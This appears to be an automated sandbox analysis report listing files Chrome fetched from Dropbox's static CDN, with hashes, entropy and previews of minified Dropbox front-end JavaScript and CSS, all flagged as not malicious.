                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var r=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,r.get?r:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var r=c(t);e.HighlightLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"m18.022 6.662-.654-.667a3.308 3.308 0 0 0-4.736 0l-5.942 6.05V14.1a3.02 3.02 0 0 1-.868 2.133l-1.275 1.293 3.21 1.071.218-.22a2.886 2.886 0 0 1 2.072-.877h2.027l5.95-6.055a3.43 3.43 0 0 0-.002-4.783ZM11.446 16h-1.4a4.358 4.358 0 0 0-2.215.6l-.242-.246c.394-.687.6-1.466.6-2.258v-1.439l.332-.338 3.27 3.331-.346.35Zm1.396-1.421L9.573 11.25l3.27-3.328 3.268 3.328-3.269 3.329Zm4.3-4.421-3.227-3.286a1.854 1.854 0 0 1 2.383.174l.652.666a1.922 1.922 0 0 1 .192 2.446Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.ScribbleLine=e=>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1159)
                                                    Category:dropped
                                                    Size (bytes):1221
                                                    Entropy (8bit):4.9826987552838595
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2DF68D3E1AB84D5E4DB370914B7B7723
                                                    SHA1:2300B8BF19F94F8C162026DE61785ABBE1AE9DF1
                                                    SHA-256:0F6342B862036538539687483DCEE1B41A8F7E62013A68BEB45CC53EA6CA080F
                                                    SHA-512:893DABD308B49C46CAFE15ADC6D1B9D92DC9FD6B3031B779566C23FA62436A8916895B8E27CDBA6CCCF68D9D4DC24B186DBB1A7A12C5C54EB33FD5D15515C471
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(e){"use strict";var r,o,i;e.FileSource=void 0,(r=e.FileSource||(e.FileSource={})).Dropbox="dropbox",r.Computer="computer",r.Server="server",e.UploadStatus=void 0,(o=e.UploadStatus||(e.UploadStatus={})).Staged="staged",o.Queued="queued",o.Uploading="uploading",o.Success="success",o.Error="error",o.Cancelling="cancelling",o.Canceled="canceled",e.UploadErrorType=void 0,(i=e.UploadErrorType||(e.UploadErrorType={})).CloudDoc="cloud_doc",i.EmptyFile="empty_file",i.DuplicateFile="duplicate_file",i.IgnoredFile="ignored_file",i.OverMaxFileSize="over_max_file_size",i.MalformedIosImage="malformed_ios_image",i.EncryptedFolderKeyVerificationRequired="encrypted_folder_key_verification_required",i.EncryptedFolderClientNotEnrolled="encrypted_folder_client_not_enrolled",i.EncryptedFolderNotSupportedForContentManager="encrypted_folder_not_supported_for_content_manager",i.PointerFile="pointer_file",i.TemporaryFile="temporary_file",i.InvalidChar="invalid_char",i.NotFound="not_
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1106)
                                                    Category:downloaded
                                                    Size (bytes):1183
                                                    Entropy (8bit):5.054454894553397
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B667E5AE4801AF24B260D46EACA1325E
                                                    SHA1:D7BFC0EB17D90CC2BBFB15C4ACFB0AA8FA2FE02B
                                                    SHA-256:C5A3986EA87425A55E4CA501DE6E9782375AC11F6C0896D75DDCD619ED6C66CA
                                                    SHA-512:42B2E70670A69CFF6C8825E627DD65D580838E8D997939C845C9A9B6EBB482BDFA9A2788ADCDA4E3EA3427CAE1ADE7071E3C89BC8884A35A77A4ACF1E6784127
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_stormcrow_stormcrow_exposure_logger-vfltmflrk.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_ts_utils","react","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,s,r,o,t,_,c,n,i,a,u,l,d,p,g,m,v,x){"use strict";e.StormcrowExposureLogger=class{constructor(){this.exposures={}}logExposure(e,o,t){s.SilentBackgroundRequest$1({url:"/log/stormcrow_exposures",data:{stormcrow_name:e,variant:o},subject_user:t||r.getActiveUserId()})}logExposuresOnce(e,s){Object.keys(e).forEach((r=>{if(!(r in this.exposures)){const o=e[r];r&&o&&(this.exposures[r]=o,this.logExposure(r,o,s))}}))}},e.logVariantExposure=(e,o)=>!(!o||"OFF"===o)&&s.SilentBackgroundRequest$
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1166)
                                                    Category:dropped
                                                    Size (bytes):1228
                                                    Entropy (8bit):4.9894409437233636
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:53888D545F647A8CCF2D5436BF474047
                                                    SHA1:05ECCF8AE81798FC421EEA789E2AABA38DA3E26D
                                                    SHA-256:78F0306FE7B822180E3FA78A2028D179FE0B5A9452F98278710C1E1714BDC5F0
                                                    SHA-512:7A10C53EDA38BC40913458F96F2652450091553B48A99F19EE78208DD31E982883D38298F30F314416549E870ABDE0F50EC22F7271C505B37A582AF74F482C48
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(o){"use strict";var e;o.Action=void 0,(e=o.Action||(o.Action={})).Log="@@previews/log",e.LogDuration="@@previews/logDuration",e.LogUserAction="@@previews/LogUserAction",e.LogBackgroundEvent="@@previews/LogBackgroundEvent",e.LogSessionEvent="@@previews/logSessionEvent",e.LogTTI="@@previews/logTTI",e.LogVideoEvent="@@previews/logVideoEvent",e.LogVideoEventQuantity="@@previews/logVideoEventQuantity",e.LogVideoEventDuration="@@previews/logVideoEventDuration",e.UpdateFitScaleFactor="UpdateFitScaleFactor",o.logBackgroundEvent=function(e){return{type:o.Action.LogBackgroundEvent,payload:e}},o.logPreviewEvent=function(e){return{type:o.Action.Log,payload:e}},o.logSessionEvent=function(e){return{type:o.Action.LogSessionEvent,payload:e}},o.logTTI=function(e){return{type:o.Action.LogTTI,payload:e}},o.logUserActionEvent=function(e){return{type:o.Action.LogUserAction,payload:e}},o.logVideoEvent=function(e){return{type:o.Action.LogVideoEvent,payload:e}},o.logVideoEventDura
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (26025)
                                                    Category:dropped
                                                    Size (bytes):26078
                                                    Entropy (8bit):5.2436796897311035
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D7A9896443B947689ED5CB3B4C911559
                                                    SHA1:C1D06D3CEACC45B2A8F9597AE19AE918A9855B7A
                                                    SHA-256:C2EAFB4B59DF1C519A246452BE3C64171617C9FF982EB3FDD9456EF0784F6666
                                                    SHA-512:31224F3E9BD3E883C789B5CCAB24269E1BE8FC33ED75B3104EC4A4E49471673E1D4F43BCA94652AAF0C16AB0EF7DC097E3E8446DB83D6AE14C3B77BF8F15FAA9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","./e_core_exception","./c_ux_analytics_ux_variants","react","./c_core_i18n","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./c_lodash","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,t,n,i,a,s,o,r,l,c,d,u,h,g,m,p,_,f,v,y){"use strict";function E(){try{return window.self!==window.top}catch(e){return!0}}const w=()=>location.hostname.split(".").slice(-2).join("."),k=()=>"dropbox.com"===w(),I=()=>!!k()||("docsend.com"===w()||("dash.ai"===w()||("dropboxforum.com"===w()||("webflow.io"===w()||"app.hellosign.com"===location.hostname)))),b=e=>({element_id:e.getAttribute("data-uxa-log"),tag_name:e.tagName.toLowerCase(),entity_i
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (966)
                                                    Category:dropped
                                                    Size (bytes):1029
                                                    Entropy (8bit):5.1791388986853875
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8F0FF0D32B053AC5C74056AFC026DFDD
                                                    SHA1:312AB435CD8E7EEB870F2CDE81964F230DADD5E0
                                                    SHA-256:A2A012A9269085616FD262E99E70A0A4A7C048DFD4558162007654212A319B6E
                                                    SHA-512:B3B47B89F5C233F4CD0B7240224B5C1A14D23ACC96FDA5F41F0EA46294855615C705AA5CB060F936181E94125B764C6A8580720D747211F690708F1E39A0392A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react"],(function(e,t,r){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var a=n(r);t.injectInternalStyle("/static/js/file_viewer/ui/header.module.out-vflXaK8vf.css",(e=>"._headerContainer_1gkbm_1{align-items:center;display:flex;flex:1;flex-direction:column;height:100%;min-width:0}"));const i=a.memo((({header:e})=>{const[t,r]=a.useState(!1);if(e&&!t){const t=e;return a.createElement(t,{onHide:()=>r(!0)})}return null}));i.displayName="Header";const c=({header:e,className:r,children:n,...c})=>a.createElement("div",{className:t.cx("_headerContainer_1gkbm_1",r),...c},a.createElement(i,{header:e}),n);c.displayName="ContentHeader",e.ContentHeader=c}));.//# sourceMappingURL=c_file_viewe
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1098)
                                                    Category:dropped
                                                    Size (bytes):1163
                                                    Entropy (8bit):5.619464837437973
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8C118EC494D4F4FEC931A29180BBBDFB
                                                    SHA1:D60C5836E22CD3935982C157B355D506CF36FB47
                                                    SHA-256:1FDCDA91EFFBF085F6C66033A2945EA32A7F8AAD24642485916B3289EFDC8611
                                                    SHA-512:A0E9CB3EE3778B5C117B555BEF6B308EAD73FC4A25C60923A1E9AFE45F5AF8DC26638473CF34C570A1ED920CC0EF84E133CA328C175153873A564A2438DCA0A1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_core_i18n"],(function(e,E){"use strict";var _,L,O;e.ACCESS_LEVEL=void 0,(_=e.ACCESS_LEVEL||(e.ACCESS_LEVEL={}))[_.ACCESS=0]="ACCESS",_.LIMITED_ACCESS="locked",_.LIMITED_ACCESS_VAULT="vault",_.NO_ACCESS="no_access",e.Operation=void 0,(L=e.Operation||(e.Operation={}))[L.COPY=0]="COPY",L[L.MOVE=1]="MOVE",L[L.UPLOAD=2]="UPLOAD",L[L.EXPORT_LEGAL_HOLD=3]="EXPORT_LEGAL_HOLD",e.FolderPickerLoadingState=void 0,(O=e.FolderPickerLoadingState||(e.FolderPickerLoadingState={}))[O.LOADING=0]="LOADING",O[O.ERROR=1]="ERROR",O[O.LOADED=2]="LOADED",E.intl.formatMessage({id:"BCyGLk",defaultMessage:"Try again"}),E.intl.formatMessage({id:"d9/SE1",defaultMessage:"Cancel"}),E.intl.formatMessage({id:"v3oTv1",defaultMessage:"Something went wrong on our end"});e.DIALOG_ACTIONS_HEIGHT=64,e.DIALOG_BODY_PADDING=26,e.DIALOG_HEAD_HEIGHT=64,e.FOLDER_SUGGESTION_HEIGHT=89,e.INVALID_FOCUS_INDEX=-1,e.KEY_SCOPE="folder_picker_keyboard_selection",e.LOADING_MIN_TIME=200,e.MAX_FOLDER_NAME_LENGTH=20,e.PA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2429)
                                                    Category:dropped
                                                    Size (bytes):2510
                                                    Entropy (8bit):5.0968992633768755
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2C52C3CC0F878085833F16A967A5D29E
                                                    SHA1:D48735F15E85C212A258D4FB547E5FBDE7A21E1B
                                                    SHA-256:7D4BD7A1E8C37D5B3AFA3D148E2B55EABD01DC1FCCFEE57B4A33FD739EAABA15
                                                    SHA-512:259C91364DADDE4DEA6325C5192F26833A8A988AF56984211FA1E0B15F2352BC63915766919BC4C84C98E703E30CE58901C19D43BB9B63633A82652ABAE7D6AB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.CommentLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M17.75 5.5H6.25A2.25 2.25 0 0 0 4 7.75v7A2.25 2.25 0 0 0 6.25 17H7v2.492L11.736 17h6.014A2.249 2.249 0 0 0 20 14.75v-7a2.25 2.25 0 0 0-2.25-2.25Zm.75 9.25a.75.75 0 0 1-.75.75h-6.386L8.5 17.008V15.5H6.25a.75.75 0 0 1-.75-.75v-7A.75.75 0 0 1 6.25 7h11.5a.75.75 0 0 1 .75.75v7Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"M15 9H9v1.5h6V9Zm-1.5 3H9v1.5h4.5V12Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.MicLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createEleme
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):415116
                                                    Entropy (8bit):4.780994345257006
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1709B1B6D39A0DF5599E90060B73FE61
                                                    SHA1:49AE3EAAC9CBA56B308993C7F7BB2C280F69C637
                                                    SHA-256:B5BE0ED99FB0E224C52E505F6BF829D764C6350FB60E7E1921BBEF1F0E062DB6
                                                    SHA-512:EE8901DC0D3B06FA777A41FFE0B25661CF736E75C7E06F332607B73CCB9A5D41136BBE9327CB8F620457FE186F0FB42B4940BAE354235F882454A115CD97AF4A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(e){"use strict";var t="app",r="user",i="team",a="dropboxapi.com",n="dropbox.com",s={api:"api",notify:"bolt",content:"api-content"},u={accessControlCanControlAccess:function(e){return this.request("access_control/can_control_access",e,"team","api","rpc","private:account_info.read")},accessControlGetAccess:function(e){return this.request("access_control/get_access",e,"team","api","rpc","private:files.team_metadata.write")},accessControlGetAccessCounts:function(e){return this.request("access_control/get_access_counts",e,"team","api","rpc","private:files.team_metadata.write")},accessControlGetAccessForNewTeamMembers:function(e){return this.request("access_control/get_access_for_new_team_members",e,"team","api","rpc","private:files.team_metadata.write")},accessControlGetAdminPermissions:function(e){return this.request("access_control/get_admin_permissions",e,"team","api","rpc","private:account_info.read")},accessControlGetExternalSharingSettingOverrides:function
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (40406)
                                                    Category:downloaded
                                                    Size (bytes):40480
                                                    Entropy (8bit):5.357206875268569
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:56F24BF65A9DBF2F742B23862202581E
                                                    SHA1:4A3F4D54CF39D4AC5FE022EBBDF205B462A2D30C
                                                    SHA-256:CFAC3A2722FCB92E5844C231276C621A1F67285EB7172AB9206C56BA34BA91B8
                                                    SHA-512:2673463BC63D4C2336D61859B797B2CB6CC35F1ACB2C964DDEADC7097AC5ED739B18C4835BA14A539FA8E515614E96D79450A4B923F6B405984063767776FE7E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/js/file_viewer/index.web-vflVvJL9l.css
                                                    Preview:./* -- bazel-out/k8-opt/bin/node_modules/videojs/dist/video-js.css */.@charset "UTF-8";.video-js .vjs-big-play-button .vjs-icon-placeholder:before,.video-js .vjs-modal-dialog,.vjs-button>.vjs-icon-placeholder:before,.vjs-modal-dialog .vjs-modal-dialog-content{height:100%;left:0;position:absolute;top:0;width:100%}.video-js .vjs-big-play-button .vjs-icon-placeholder:before,.vjs-button>.vjs-icon-placeholder:before{text-align:center}@font-face{font-family:VideoJS;font-style:normal;font-weight:400;src:url(data:application/font-woff;charset=utf-8;base64,d09GRgABAAAAABDkAAsAAAAAG6gAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABHU1VCAAABCAAAADsAAABUIIslek9TLzIAAAFEAAAAPgAAAFZRiV3hY21hcAAAAYQAAADaAAADPv749/pnbHlmAAACYAAAC3AAABHQZg6OcWhlYWQAAA3QAAAAKwAAADYZw251aGhlYQAADfwAAAAdAAAAJA+RCLFobXR4AAAOHAAAABMAAACM744AAGxvY2EAAA4wAAAASAAAAEhF6kqubWF4cAAADngAAAAfAAAAIAE0AIFuYW1lAAAOmAAAASUAAAIK1cf1oHBvc3QAAA/AAAABJAAAAdPExYuNeJxjYGRgYOBiMGCwY2BycfMJYeDLSSzJY5BiYGGAAJA8MpsxJzM9kYEDxgPKsYBpDiBmg4gCACY7BUgAeJxjYGS7wTiBgZ
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (21594)
                                                    Category:downloaded
                                                    Size (bytes):21663
                                                    Entropy (8bit):5.448481756644135
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0FF877D0979111232990EAD9EF1BDD45
                                                    SHA1:49FFC96FDC605F45881717103E23D16505DF944D
                                                    SHA-256:84E3E6357B8B5AF1CC90EFB57713E6E68C1ACCFC3036FB0685709331BBEE84AC
                                                    SHA-512:1427217284C8D64E6342DB64D8AAC43F5D7556FA621AB2A2C5E49AE65EFA3AE11C1A8315BFCA3E31CE9FD21D360B4C4DD9ED867214554465ED9D32673CF10390
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_browse_data_selectors-vflD_h30J.js
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","./c_tagging_utils","react","./c_core_i18n","./c_dig-icons_assets_ui-icon_line_star","./c_browse_models","./c_browse_action_logger","./e_core_exception","./c_api_v2_routes_folders_info_provider","./c_files_view_util","./c_sync_everything_redux_selectors"],(function(e,t,r,i,s,n,o,a,l,c,d,u,_){"use strict";function E(e){return e&&e.__esModule?e:{default:e}}var S=E(s);const p=S.default.lazy((async()=>{const{ShelfEmptySpot:t}=await new Promise((function(t,r){e(["./c_dig-illustrations_spot_shelf-empty"],t,r)}));return{default:t}})),T=()=>S.default.createElement(S.default.Suspense,{fallback:null},S.default.createElement(p,null));T.displayName="AsyncShelfEmptySpot";const f=S.default.lazy((async()=>{const{StarStickersSpot:t}=await new Promise((function(t,r){e(["./c_dig-illustrations_spot_star-stickers"],t,r)}));return{default:t}})),I=()=>S.default.createElement(S.default.Suspense,{fallback:null},S.default.createElement(f,null
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5609)
                                                    Category:dropped
                                                    Size (bytes):5688
                                                    Entropy (8bit):5.371726248146369
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D0996E7B96ECA1D4B748612B9C972032
                                                    SHA1:7342AF880553AB500542193CFC5A11944A675B73
                                                    SHA-256:87E4DE7C747A1CFC2C458D318DA692E1355839C1C27115A82D5E23EDF01F6BC2
                                                    SHA-512:0A2CF2D0B29B2510E4C1C20223F9B1D275831464B937F4A57E3B1A9D9F8EB0EA62912D47002EEDA37530C0D0A17887DC70C1BBC2CCA9D33E351C880E453555C7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_action_plugins_conversion_action_conditions","./e_file_viewer_static_scl_page_folder","./c_starred_redux_slice","react","./c_reduxjs_toolkit_redux-toolkit","./c_action_bar_action_bar_strings","./c_flux_action_type","./e_core_exception","./c_ts_utils","./c_core_i18n","./c_react-redux_hooks_useDispatch","./c_dig-icons_assets_ui-icon_line_file","./c_dig-icons_assets_ui-icon_line_star"],(function(e,i,r,t,a,_,s,l,o,n,c,g,S,d){"use strict";const u={...i.fileActionCondition,filterValidFile:e=>{const r=i.fileActionCondition.filterValidFile(e);return!r||i.isInsideVaultFolder(r)||i.isPnmSuppressMoveSelected(r)?void 0:r}};var f;!function(e){e.HOME_STARRED="HOME_STARRED",e.HOME_RECENTS="HOME_RECENTS",e.BROWSE="BROWSE",e.FILE_VIEWER="FILE_VIEWER",e.SUGGESTED_STARS="SUGGESTED_STARS",e.HOME_TASKS="HOME_TASKS",e.QUICK_VIEW_BROWSE="QUICK_VIEW_BROWSE"}(f||(f={})),f.HOME_STARRED,f.HOME_RECENTS;let w;r.injectInternalStyle("/static/metaserver/static/js/starred/star.module.out-vfllWzw
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1959)
                                                    Category:dropped
                                                    Size (bytes):2024
                                                    Entropy (8bit):5.418924090573154
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:86978557FCD06865F71DA602B6A662C3
                                                    SHA1:A6617684660F81D9CB4759177426725C712B6325
                                                    SHA-256:AE7591D88ED2ED0EB3A0B054DF73DBBD06078FB6DF385FA44CEC777401B7592B
                                                    SHA-512:CFF8B03F3E424BA01A2AFE759A269E28CB5F42985DE812F2C13D9FD8054776B6B81116BD5322031091D59D5C5D84E66B7177CD100398DA9C69B7474F17E84650
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var r=n(t);e.CheckmarkCircleFill=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M12 4c-5.159 0-8 2.841-8 8s2.841 8 8 8 8-2.841 8-8-2.841-8-8-8Zm-1 11.56-3.03-3.03 1.06-1.06L11 13.44l3.97-3.97 1.06 1.06L11 15.56Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.RotateLeftLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M12 5.5c-2.557 0-4.085.862-5 1.879V5.5H5.5V10H10V8.5H8.027C8.85 7.51 10.177 7 12 7c3.364 0 5 1.636 5 5s-1.636 5-5 5a5.894 5.894 0 0 1-3.108-.729l-.787 1.279A7.35 7.35 0 0 0 12 18.5c4.192 0 6.5-2.308 6.5-6.5 0-4.191-2.308-6.5-6.5-6.5Z",f
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3176)
                                                    Category:downloaded
                                                    Size (bytes):3233
                                                    Entropy (8bit):5.247060064892514
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:744A17B187651F30AEFBCF805D63C2A8
                                                    SHA1:B6A49A1AE3972BB391DF615E194A6AEC7478AE48
                                                    SHA-256:66C00D2B1D0133D0694DB7E75B123C8C4DEA5F5194131E4A1B1AC0DD3AAC2891
                                                    SHA-512:C07196578C6216D847292CD90C1B04E61695B75C16EE9CCB3A6D2D137B7BE03C684D2DA3B647747C3AD48B4B1EDA3053076BF168555BA68B2C549E6037328B7F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_portable_delete-vfldEoXsY.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_core_i18n","./c_action_bar_action_bar_strings","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_portable_delete_strings","./c_files_view_file_actions_api_v2","./e_edison","./c_ts_utils","./e_core_exception","./c_lodash","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_src_sink_index","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","metaserver/static/js/langpack"],(function(e,t,a,l,n,o,s,r,i,_,c,u,d,f,m,E,p,g,M,C,v){"use strict";function T(e){return e&&e.__esModule?e:{default:e}}var h=T(a);const b=({user:e,fq_path:a,totalFilesCount:r,onConfirm:i,onRequestClose:_,setDeleteFileModalOpen:c})=>{const[u,d]=h.default.useState(!0),f=()=>{d(!1),null==_||_()},m=e.is_cdm_member||e.is_tmr_member,E=l.intl.formatMessage({id:"FMtrmh",defaultMessage:"{fileCount, p
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1530)
                                                    Category:downloaded
                                                    Size (bytes):1602
                                                    Entropy (8bit):5.4161940719588095
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8FB7A2B4652F34F5CA811151525A502D
                                                    SHA1:AC8ACBC93595E9CB1BB2831878CA6E419E05DB08
                                                    SHA-256:3B4092679D59D88AA7B07CFD218B71D66CDF6241CD7028C8954C61F19164190C
                                                    SHA-512:2B3AD19A4AB97F80FE3D0AB8496533BE00C6C22E9736AA2F1C68BDE896CA7FC0140C4107B0DADBD031A1AAFE35CCB685E04F2E44F190892C69D218CF80674B8A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_preview_tour_utils-vflj7eitG.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react"],(function(e,r,t){"use strict";function S(e){return e&&e.__esModule?e:{default:e}}var i=S(t);const u="rrc_tooltip_tour",o=()=>{const e=JSON.stringify((new Date).getTime()+1728e5);window.localStorage.setItem(u,e)},c=e=>{const r=(e=>{const r=window.localStorage.getItem(e);return r?JSON.parse(r):null})(e);if(!r)return o(),!0;const t=(new Date).getTime()>r;return t&&o(),t},n=[r.SDKPreviewSurface.BROWSE,r.SDKPreviewSurface.HOME,r.SDKPreviewSurface.HELLOSIGN,r.SDKPreviewSurface.SEARCH,r.SDKPreviewSurface.RECENTS,r.SDKPreviewSurface.STARRED,r.SDKPreviewSurface.STANDALONE_PREVIEW,r.SDKPreviewSurface.PHOTOS,r.SDKPreviewSurface.FILE_LOCKING,r.SDKPreviewSurface.INBAND_SHARE,r.SDKPreviewSurface.SHARED_LINK,r.SDKPreviewSurface.SHARED_CONTENT_LINK];let a;const s=()=>a;e.setCachedUserSeenTour=e=>a=e,e.useShouldShowPreviewTour=({hideTour:e,surfaceLevelSusiEnabled:t,user:S,previewSurface:o,previewContentOnly:a,isMobile:w,isEditMode:l,so
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1061)
                                                    Category:dropped
                                                    Size (bytes):1136
                                                    Entropy (8bit):5.168160736806697
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:054EA69A9F349896154A716CE01C1720
                                                    SHA1:EC2C9DBF1339F6304648D9AACFB50288F8C6793E
                                                    SHA-256:6CA0EA490ADF06C6794CC8CA9312287B83DAEAF05E4DFBF8A13D93F0A6EBFEF8
                                                    SHA-512:C83C9ABA89B17EA0241C6BBBCE5F32BF4725F13F022ED16B3D93D761060DC8AD540AD32B5CA516093579614F88CBC48239FDE85B2B45E88A0B9BD1580B772A13
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(e){"use strict";const t={simpleFilter:(e,r)=>r.filter((r=>t.test(e,r))),test:(e,r)=>null!==t.match(e,r),match(e,t,r){r=r||{};let i=0;const n=[],s=t.length;let o=0,c=0;const h=r.pre||"",l=r.post||"",u=r.caseSensitive&&t||t.toLowerCase();e=r.caseSensitive&&e||e.toLowerCase();let a=0;const d=[];let f=0,g=0;for(;a<s;){let r=t[a];u[a]===e[i]?(r=h+r+l,g?g+=1:(f=a,g=1),i+=1,c+=1+c):(c=0,g&&(d.push([f,g]),g=0)),o+=c,n[n.length]=r,a++}if(g&&d.push([f,g]),i===e.length)return{highlighted:d,rendered:n.join(""),score:o}},filter:(e,r,i)=>r.reduce(((r,n,s)=>t._reduce(e,i,r,n,s)),[]).sort(t._sort),_reduce(e,r,i,n,s){const o=r.extract(n),c=t.match(e,o,r);return null!=c&&i.push({string:c.rendered,score:c.score,index:s,original:n}),i},_sort(e,t){const r=t.score-e.score;return r||e.index-t.index}},r={size:1,minSize:.2,maxSize:5};e.fuzzy=t,e.getImageDefaultSizes=function(e,t){if(!e||!t)return r;const i=e.width/t.width,n=e.height/t.height,s=Math.max(i,n);if(s*r.maxSize<=.9)retur
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2039)
                                                    Category:downloaded
                                                    Size (bytes):2097
                                                    Entropy (8bit):5.177889808541122
